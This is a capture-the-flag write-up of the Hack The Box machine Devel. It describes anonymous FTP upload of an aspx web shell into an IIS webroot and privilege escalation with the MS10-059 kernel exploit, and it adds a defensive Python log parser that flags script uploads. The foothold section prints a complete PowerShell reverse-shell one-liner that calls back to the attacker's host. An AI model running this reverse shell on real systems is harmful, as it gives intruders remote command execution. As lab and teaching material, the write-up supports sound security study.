Hack The Box: Devel write-up

Devel is an easy Windows machine from HackTheBox. Completing it requires knowledge of FTP and Windows kernel exploits.

Enumeration

Nmap to start.

Figure 1 – nmap output

Only ports 80 and 21 were open. Port 21 is obviously FTP and the nmap scan said anonymous access was allowed, so I started there.

Figure 2 – FTP root directory

Foothold

The contents of the root FTP directory looked like the standard IIS root folder contents, and I validated this by opening http://10.129.66.3 in a browser. I was therefore fairly confident that if I could upload a file here I would be able to execute it from the browser, so I uploaded an aspx shell over FTP and requested it in the browser to check.

Figure 3 – Uploading aspx shell via FTP
Figure 4 – Executing shell in browser

My shell was successful, so the next step was to use it to launch an interactive shell back to my terminal. I did this with the PowerShell command below:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.8',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Figure 5 – Gaining foothold
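The foothold above works because the anonymous FTP root is the IIS webroot, so any upload of a server-side script is immediately executable. As an added defender-side example (not part of the original write-up), the script below parses IIS FTP W3C-format log lines and flags STOR/APPE of files with script extensions; the log lines are constructed, and the field layout is taken from the #Fields header so the parser adapts to whatever columns a server logs.

```python
"""Flag FTP uploads of server-side script files into an IIS webroot.
Parses IIS FTP W3C log lines; field names come from the #Fields header,
so the parser adapts to whatever columns the server logs."""
import re

# Extensions IIS hands to a script engine: an upload of one of these into
# the FTP root (= wwwroot on this box) is a remote code-execution path.
RISKY_EXT = re.compile(r"\.(aspx?|ashx|asmx|config)$", re.IGNORECASE)
UPLOAD_CMDS = {"STOR", "APPE"}
ANON_USERS = {"anonymous", "ftp", "-"}

def parse_w3c(lines):
    """Yield one dict per record, keyed by the names in the #Fields line."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split(" ")
            if len(parts) == len(fields):  # skip truncated/garbled lines
                yield dict(zip(fields, parts))

def find_script_uploads(lines):
    """Return (time, client, user, path, is_anonymous) for each risky upload."""
    out = []
    for r in parse_w3c(lines):
        path = r.get("cs-uri-stem", "")
        if r.get("cs-method") in UPLOAD_CMDS and RISKY_EXT.search(path):
            user = r.get("cs-username", "-")
            out.append((f'{r.get("date")} {r.get("time")}', r.get("c-ip"),
                        user, path, user.lower() in ANON_USERS))
    return out

# Constructed sample log (not captured from the machine).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status sc-win32-status
2024-01-01 10:00:01 10.10.14.8 anonymous USER anonymous 331 0
2024-01-01 10:00:01 10.10.14.8 anonymous PASS *** 230 0
2024-01-01 10:00:09 10.10.14.8 anonymous STOR /shell.aspx 226 0
2024-01-01 10:01:12 10.10.14.8 anonymous STOR /notes.txt 226 0
2024-01-01 10:05:40 10.10.14.8 anonymous STOR /ms10-059.exe 226 0
2024-01-01 11:00:00 192.168.1.20 deploy STOR /Default.aspx 226 0
""".splitlines()

if __name__ == "__main__":
    for when, client, user, path, anon in find_script_uploads(SAMPLE_LOG):
        print(f"{when} {client} {'ANONYMOUS' if anon else user} uploaded {path}")
```

The .exe upload is deliberately not flagged here since IIS does not execute it; the real fix is removing write access for anonymous FTP users on the webroot.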

Privilege escalation

Now that I had a foothold I started to work on privilege escalation. I used Windows Exploit Suggester (https://github.com/AonCyberLabs/Windows-Exploit-Suggester) to find any easy kernel exploits. The output is below, filtered for only exploits that allowed for privilege escalation.

Figure 6 – Windows Exploit Suggester output

I started at the top of the list and worked my way down the exploits. Eventually, I found that MS10-059 worked, using a pre-compiled exploit available from SecWiki (https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059). I used FTP to upload the exploit to the victim machine, with the important step of first switching to binary transfer mode (an ASCII-mode transfer would corrupt the executable).

Figure 7 – Uploading MS10-059

From my low privilege shell I executed the exploit to spawn a privileged shell back to my Kali machine.

Figure 8 – Privileged shell using MS10-059
